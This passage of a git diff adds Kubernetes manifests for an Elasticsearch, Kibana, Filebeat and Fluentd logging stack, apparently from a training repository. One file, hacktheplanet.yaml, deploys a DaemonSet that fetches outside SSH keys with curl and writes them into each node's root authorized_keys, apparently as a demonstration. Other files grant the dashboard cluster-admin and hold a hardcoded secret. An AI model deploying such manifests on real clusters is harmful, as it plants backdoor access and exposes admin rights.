||||
name: cerebro
|
||||
containers:
|
||||
- image: lmenezes/cerebro
|
||||
name: cerebro
|
||||
volumeMounts:
|
||||
- name: conf
|
||||
mountPath: /conf
|
||||
args:
|
||||
- -Dconfig.file=/conf/application.conf
|
||||
env:
|
||||
- name: ELASTICSEARCH_PASSWORD
|
||||
valueFrom:
|
||||
secretKeyRef:
|
||||
name: demo-es-elastic-user
|
||||
key: elastic
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: cerebro
|
||||
name: cerebro
|
||||
spec:
|
||||
ports:
|
||||
- port: 9000
|
||||
protocol: TCP
|
||||
targetPort: 9000
|
||||
selector:
|
||||
app: cerebro
|
||||
type: NodePort
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: cerebro
|
||||
data:
|
||||
application.conf: |
|
||||
secret = "ki:s:[[@=Ag?QI`W2jMwkY:eqvrJ]JqoJyi2axj3ZvOv^/KavOT4ViJSv?6YY4[N"
|
||||
|
||||
hosts = [
|
||||
{
|
||||
host = "http://demo-es-http.eck-demo.svc.cluster.local:9200"
|
||||
name = "demo"
|
||||
auth = {
|
||||
username = "elastic"
|
||||
password = ${?ELASTICSEARCH_PASSWORD}
|
||||
}
|
||||
}
|
||||
]
|
||||
19
k8s/eck-elasticsearch.yaml
Normal file
19
k8s/eck-elasticsearch.yaml
Normal file
@@ -0,0 +1,19 @@
|
||||
apiVersion: elasticsearch.k8s.elastic.co/v1
|
||||
kind: Elasticsearch
|
||||
metadata:
|
||||
name: demo
|
||||
namespace: eck-demo
|
||||
spec:
|
||||
http:
|
||||
tls:
|
||||
selfSignedCertificate:
|
||||
disabled: true
|
||||
nodeSets:
|
||||
- name: default
|
||||
count: 1
|
||||
config:
|
||||
node.data: true
|
||||
node.ingest: true
|
||||
node.master: true
|
||||
node.store.allow_mmap: false
|
||||
version: 7.5.1
|
||||
168
k8s/eck-filebeat.yaml
Normal file
168
k8s/eck-filebeat.yaml
Normal file
@@ -0,0 +1,168 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-config
|
||||
namespace: eck-demo
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
filebeat.yml: |-
|
||||
filebeat.inputs:
|
||||
- type: container
|
||||
paths:
|
||||
- /var/log/containers/*.log
|
||||
processors:
|
||||
- add_kubernetes_metadata:
|
||||
host: ${NODE_NAME}
|
||||
matchers:
|
||||
- logs_path:
|
||||
logs_path: "/var/log/containers/"
|
||||
|
||||
# To enable hints based autodiscover, remove `filebeat.inputs` configuration and uncomment this:
|
||||
#filebeat.autodiscover:
|
||||
# providers:
|
||||
# - type: kubernetes
|
||||
# node: ${NODE_NAME}
|
||||
# hints.enabled: true
|
||||
# hints.default_config:
|
||||
# type: container
|
||||
# paths:
|
||||
# - /var/log/containers/*${data.kubernetes.container.id}.log
|
||||
|
||||
processors:
|
||||
- add_cloud_metadata:
|
||||
- add_host_metadata:
|
||||
|
||||
cloud.id: ${ELASTIC_CLOUD_ID}
|
||||
cloud.auth: ${ELASTIC_CLOUD_AUTH}
|
||||
|
||||
output.elasticsearch:
|
||||
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
|
||||
username: ${ELASTICSEARCH_USERNAME}
|
||||
password: ${ELASTICSEARCH_PASSWORD}
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: eck-demo
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: filebeat
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
serviceAccountName: filebeat
|
||||
terminationGracePeriodSeconds: 30
|
||||
hostNetwork: true
|
||||
dnsPolicy: ClusterFirstWithHostNet
|
||||
containers:
|
||||
- name: filebeat
|
||||
image: docker.elastic.co/beats/filebeat:7.5.1
|
||||
args: [
|
||||
"-c", "/etc/filebeat.yml",
|
||||
"-e",
|
||||
]
|
||||
env:
|
||||
- name: ELASTICSEARCH_HOST
|
||||
value: demo-es-http
|
||||
- name: ELASTICSEARCH_PORT
|
||||
value: "9200"
|
||||
- name: ELASTICSEARCH_USERNAME
|
||||
value: elastic
|
||||
- name: ELASTICSEARCH_PASSWORD
|
||||
valueFrom:
|
||||
secretKeyRef:
|
||||
name: demo-es-elastic-user
|
||||
key: elastic
|
||||
- name: ELASTIC_CLOUD_ID
|
||||
value:
|
||||
- name: ELASTIC_CLOUD_AUTH
|
||||
value:
|
||||
- name: NODE_NAME
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: spec.nodeName
|
||||
securityContext:
|
||||
runAsUser: 0
|
||||
# If using Red Hat OpenShift uncomment this:
|
||||
#privileged: true
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
requests:
|
||||
cpu: 100m
|
||||
memory: 100Mi
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /etc/filebeat.yml
|
||||
readOnly: true
|
||||
subPath: filebeat.yml
|
||||
- name: data
|
||||
mountPath: /usr/share/filebeat/data
|
||||
- name: varlibdockercontainers
|
||||
mountPath: /var/lib/docker/containers
|
||||
readOnly: true
|
||||
- name: varlog
|
||||
mountPath: /var/log
|
||||
readOnly: true
|
||||
volumes:
|
||||
- name: config
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-config
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
- name: varlog
|
||||
hostPath:
|
||||
path: /var/log
|
||||
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
|
||||
- name: data
|
||||
hostPath:
|
||||
path: /var/lib/filebeat-data
|
||||
type: DirectoryOrCreate
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: filebeat
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: filebeat
|
||||
namespace: eck-demo
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: filebeat
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: filebeat
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
rules:
|
||||
- apiGroups: [""] # "" indicates the core API group
|
||||
resources:
|
||||
- namespaces
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- watch
|
||||
- list
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: eck-demo
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
---
|
||||
17
k8s/eck-kibana.yaml
Normal file
17
k8s/eck-kibana.yaml
Normal file
@@ -0,0 +1,17 @@
|
||||
apiVersion: kibana.k8s.elastic.co/v1
|
||||
kind: Kibana
|
||||
metadata:
|
||||
name: demo
|
||||
spec:
|
||||
version: 7.5.1
|
||||
count: 1
|
||||
elasticsearchRef:
|
||||
name: demo
|
||||
namespace: eck-demo
|
||||
http:
|
||||
service:
|
||||
spec:
|
||||
type: NodePort
|
||||
tls:
|
||||
selfSignedCertificate:
|
||||
disabled: true
|
||||
1802
k8s/eck-operator.yaml
Normal file
1802
k8s/eck-operator.yaml
Normal file
File diff suppressed because it is too large
Load Diff
176
k8s/efk.yaml
Normal file
176
k8s/efk.yaml
Normal file
@@ -0,0 +1,176 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: fluentd
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: fluentd
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- pods
|
||||
- namespaces
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
kind: ClusterRoleBinding
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
metadata:
|
||||
name: fluentd
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: fluentd
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: fluentd
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: fluentd
|
||||
namespace: default
|
||||
labels:
|
||||
app: fluentd
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: fluentd
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: fluentd
|
||||
spec:
|
||||
serviceAccount: fluentd
|
||||
serviceAccountName: fluentd
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
containers:
|
||||
- name: fluentd
|
||||
image: fluent/fluentd-kubernetes-daemonset:v1.4-debian-elasticsearch-1
|
||||
env:
|
||||
- name: FLUENT_ELASTICSEARCH_HOST
|
||||
value: "elasticsearch"
|
||||
- name: FLUENT_ELASTICSEARCH_PORT
|
||||
value: "9200"
|
||||
- name: FLUENT_ELASTICSEARCH_SCHEME
|
||||
value: "http"
|
||||
- name: FLUENT_UID
|
||||
value: "0"
|
||||
- name: FLUENTD_SYSTEMD_CONF
|
||||
value: "disable"
|
||||
- name: FLUENTD_PROMETHEUS_CONF
|
||||
value: "disable"
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
requests:
|
||||
cpu: 100m
|
||||
memory: 200Mi
|
||||
volumeMounts:
|
||||
- name: varlog
|
||||
mountPath: /var/log
|
||||
- name: varlibdockercontainers
|
||||
mountPath: /var/lib/docker/containers
|
||||
readOnly: true
|
||||
terminationGracePeriodSeconds: 30
|
||||
volumes:
|
||||
- name: varlog
|
||||
hostPath:
|
||||
path: /var/log
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: elasticsearch
|
||||
name: elasticsearch
|
||||
namespace: default
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: elasticsearch
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: elasticsearch
|
||||
spec:
|
||||
containers:
|
||||
- image: elasticsearch:5
|
||||
name: elasticsearch
|
||||
resources:
|
||||
limits:
|
||||
memory: 2Gi
|
||||
requests:
|
||||
memory: 1Gi
|
||||
env:
|
||||
- name: ES_JAVA_OPTS
|
||||
value: "-Xms1g -Xmx1g"
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: elasticsearch
|
||||
name: elasticsearch
|
||||
namespace: default
|
||||
spec:
|
||||
ports:
|
||||
- port: 9200
|
||||
protocol: TCP
|
||||
targetPort: 9200
|
||||
selector:
|
||||
app: elasticsearch
|
||||
type: ClusterIP
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: kibana
|
||||
name: kibana
|
||||
namespace: default
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: kibana
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: kibana
|
||||
spec:
|
||||
containers:
|
||||
- env:
|
||||
- name: ELASTICSEARCH_URL
|
||||
value: http://elasticsearch:9200/
|
||||
image: kibana:5
|
||||
name: kibana
|
||||
resources: {}
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: kibana
|
||||
name: kibana
|
||||
namespace: default
|
||||
spec:
|
||||
ports:
|
||||
- port: 5601
|
||||
protocol: TCP
|
||||
targetPort: 5601
|
||||
selector:
|
||||
app: kibana
|
||||
type: NodePort
|
||||
21
k8s/elasticsearch-cluster.yaml
Normal file
21
k8s/elasticsearch-cluster.yaml
Normal file
@@ -0,0 +1,21 @@
|
||||
apiVersion: enterprises.upmc.com/v1
|
||||
kind: ElasticsearchCluster
|
||||
metadata:
|
||||
name: es
|
||||
spec:
|
||||
kibana:
|
||||
image: docker.elastic.co/kibana/kibana-oss:6.1.3
|
||||
image-pull-policy: Always
|
||||
cerebro:
|
||||
image: upmcenterprises/cerebro:0.7.2
|
||||
image-pull-policy: Always
|
||||
elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
|
||||
image-pull-policy: Always
|
||||
client-node-replicas: 2
|
||||
master-node-replicas: 3
|
||||
data-node-replicas: 3
|
||||
network-host: 0.0.0.0
|
||||
use-ssl: false
|
||||
data-volume-size: 10Gi
|
||||
java-options: "-Xms512m -Xmx512m"
|
||||
|
||||
94
k8s/elasticsearch-operator.yaml
Normal file
94
k8s/elasticsearch-operator.yaml
Normal file
@@ -0,0 +1,94 @@
|
||||
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
rules:
|
||||
- apiGroups: ["extensions"]
|
||||
resources: ["deployments", "replicasets", "daemonsets"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["apiextensions.k8s.io"]
|
||||
resources: ["customresourcedefinitions"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["storage.k8s.io"]
|
||||
resources: ["storageclasses"]
|
||||
verbs: ["get", "list", "create", "delete", "deletecollection"]
|
||||
- apiGroups: [""]
|
||||
resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["batch"]
|
||||
resources: ["cronjobs", "jobs"]
|
||||
verbs: ["create", "get", "deletecollection", "delete"]
|
||||
- apiGroups: [""]
|
||||
resources: ["pods"]
|
||||
verbs: ["list", "get", "watch"]
|
||||
- apiGroups: ["apps"]
|
||||
resources: ["statefulsets", "deployments"]
|
||||
verbs: ["*"]
|
||||
- apiGroups: ["enterprises.upmc.com"]
|
||||
resources: ["elasticsearchclusters"]
|
||||
verbs: ["*"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: elasticsearch-operator
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
spec:
|
||||
replicas: 1
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
name: elasticsearch-operator
|
||||
spec:
|
||||
containers:
|
||||
- name: operator
|
||||
image: upmcenterprises/elasticsearch-operator:0.2.0
|
||||
imagePullPolicy: Always
|
||||
env:
|
||||
- name: NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
ports:
|
||||
- containerPort: 8000
|
||||
name: http
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
path: /live
|
||||
port: 8000
|
||||
initialDelaySeconds: 10
|
||||
timeoutSeconds: 10
|
||||
readinessProbe:
|
||||
httpGet:
|
||||
path: /ready
|
||||
port: 8000
|
||||
initialDelaySeconds: 10
|
||||
timeoutSeconds: 5
|
||||
serviceAccount: elasticsearch-operator
|
||||
167
k8s/filebeat.yaml
Normal file
167
k8s/filebeat.yaml
Normal file
@@ -0,0 +1,167 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-config
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
filebeat.yml: |-
|
||||
filebeat.config:
|
||||
inputs:
|
||||
# Mounted `filebeat-inputs` configmap:
|
||||
path: ${path.config}/inputs.d/*.yml
|
||||
# Reload inputs configs as they change:
|
||||
reload.enabled: false
|
||||
modules:
|
||||
path: ${path.config}/modules.d/*.yml
|
||||
# Reload module configs as they change:
|
||||
reload.enabled: false
|
||||
|
||||
# To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
|
||||
#filebeat.autodiscover:
|
||||
# providers:
|
||||
# - type: kubernetes
|
||||
# hints.enabled: true
|
||||
|
||||
processors:
|
||||
- add_cloud_metadata:
|
||||
|
||||
cloud.id: ${ELASTIC_CLOUD_ID}
|
||||
cloud.auth: ${ELASTIC_CLOUD_AUTH}
|
||||
|
||||
output.elasticsearch:
|
||||
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
|
||||
username: ${ELASTICSEARCH_USERNAME}
|
||||
password: ${ELASTICSEARCH_PASSWORD}
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-inputs
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
kubernetes.yml: |-
|
||||
- type: docker
|
||||
containers.ids:
|
||||
- "*"
|
||||
processors:
|
||||
- add_kubernetes_metadata:
|
||||
in_cluster: true
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
serviceAccountName: filebeat
|
||||
terminationGracePeriodSeconds: 30
|
||||
containers:
|
||||
- name: filebeat
|
||||
image: docker.elastic.co/beats/filebeat-oss:7.0.1
|
||||
args: [
|
||||
"-c", "/etc/filebeat.yml",
|
||||
"-e",
|
||||
]
|
||||
env:
|
||||
- name: ELASTICSEARCH_HOST
|
||||
value: elasticsearch-es.default.svc.cluster.local
|
||||
- name: ELASTICSEARCH_PORT
|
||||
value: "9200"
|
||||
- name: ELASTICSEARCH_USERNAME
|
||||
value: elastic
|
||||
- name: ELASTICSEARCH_PASSWORD
|
||||
value: changeme
|
||||
- name: ELASTIC_CLOUD_ID
|
||||
value:
|
||||
- name: ELASTIC_CLOUD_AUTH
|
||||
value:
|
||||
securityContext:
|
||||
runAsUser: 0
|
||||
# If using Red Hat OpenShift uncomment this:
|
||||
#privileged: true
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
requests:
|
||||
cpu: 100m
|
||||
memory: 100Mi
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /etc/filebeat.yml
|
||||
readOnly: true
|
||||
subPath: filebeat.yml
|
||||
- name: inputs
|
||||
mountPath: /usr/share/filebeat/inputs.d
|
||||
readOnly: true
|
||||
- name: data
|
||||
mountPath: /usr/share/filebeat/data
|
||||
- name: varlibdockercontainers
|
||||
mountPath: /var/lib/docker/containers
|
||||
readOnly: true
|
||||
volumes:
|
||||
- name: config
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-config
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
- name: inputs
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-inputs
|
||||
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
|
||||
- name: data
|
||||
hostPath:
|
||||
path: /var/lib/filebeat-data
|
||||
type: DirectoryOrCreate
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: filebeat
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: filebeat
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: filebeat
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
rules:
|
||||
- apiGroups: [""] # "" indicates the core API group
|
||||
resources:
|
||||
- namespaces
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- watch
|
||||
- list
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
---
|
||||
14
k8s/grant-admin-to-dashboard.yaml
Normal file
14
k8s/grant-admin-to-dashboard.yaml
Normal file
@@ -0,0 +1,14 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: cluster-admin
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
34
k8s/hacktheplanet.yaml
Normal file
34
k8s/hacktheplanet.yaml
Normal file
@@ -0,0 +1,34 @@
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: hacktheplanet
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hacktheplanet
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hacktheplanet
|
||||
spec:
|
||||
volumes:
|
||||
- name: root
|
||||
hostPath:
|
||||
path: /root
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
initContainers:
|
||||
- name: hacktheplanet
|
||||
image: alpine
|
||||
volumeMounts:
|
||||
- name: root
|
||||
mountPath: /root
|
||||
command:
|
||||
- sh
|
||||
- -c
|
||||
- "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
|
||||
containers:
|
||||
- name: web
|
||||
image: nginx
|
||||
|
||||
18
k8s/haproxy.cfg
Normal file
18
k8s/haproxy.cfg
Normal file
@@ -0,0 +1,18 @@
|
||||
global
|
||||
daemon
|
||||
maxconn 256
|
||||
|
||||
defaults
|
||||
mode tcp
|
||||
timeout connect 5000ms
|
||||
timeout client 50000ms
|
||||
timeout server 50000ms
|
||||
|
||||
frontend the-frontend
|
||||
bind *:80
|
||||
default_backend the-backend
|
||||
|
||||
backend the-backend
|
||||
server google.com-80 google.com:80 maxconn 32 check
|
||||
server ibm.fr-80 ibm.fr:80 maxconn 32 check
|
||||
|
||||
16
k8s/haproxy.yaml
Normal file
16
k8s/haproxy.yaml
Normal file
@@ -0,0 +1,16 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: haproxy
|
||||
spec:
|
||||
volumes:
|
||||
- name: config
|
||||
configMap:
|
||||
name: haproxy
|
||||
containers:
|
||||
- name: haproxy
|
||||
image: haproxy:1
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /usr/local/etc/haproxy/
|
||||
|
||||
13
k8s/ingress.yaml
Normal file
13
k8s/ingress.yaml
Normal file
@@ -0,0 +1,13 @@
|
||||
apiVersion: networking.k8s.io/v1beta1
|
||||
kind: Ingress
|
||||
metadata:
|
||||
name: whatever
|
||||
spec:
|
||||
rules:
|
||||
- host: whatever.A.B.C.D.nip.io
|
||||
http:
|
||||
paths:
|
||||
- path: /
|
||||
backend:
|
||||
serviceName: whatever
|
||||
servicePort: 1234
|
||||
360
k8s/insecure-dashboard.yaml
Normal file
360
k8s/insecure-dashboard.yaml
Normal file
@@ -0,0 +1,360 @@
|
||||
# Copyright 2017 The Kubernetes Authors.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 443
|
||||
targetPort: 8443
|
||||
selector:
|
||||
k8s-app: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-certs
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-csrf
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
data:
|
||||
csrf: ""
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-key-holder
|
||||
namespace: kubernetes-dashboard
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
|
||||
kind: ConfigMap
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-settings
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Role
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
rules:
|
||||
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
|
||||
verbs: ["get", "update", "delete"]
|
||||
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
resourceNames: ["kubernetes-dashboard-settings"]
|
||||
verbs: ["get", "update"]
|
||||
# Allow Dashboard to get metrics.
|
||||
- apiGroups: [""]
|
||||
resources: ["services"]
|
||||
resourceNames: ["heapster", "dashboard-metrics-scraper"]
|
||||
verbs: ["proxy"]
|
||||
- apiGroups: [""]
|
||||
resources: ["services/proxy"]
|
||||
resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
|
||||
verbs: ["get"]
|
||||
|
||||
---
|
||||
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
rules:
|
||||
# Allow Metrics Scraper to get metrics from the Metrics server
|
||||
- apiGroups: ["metrics.k8s.io"]
|
||||
resources: ["pods", "nodes"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: kubernetes-dashboard
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: kubernetes-dashboard
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
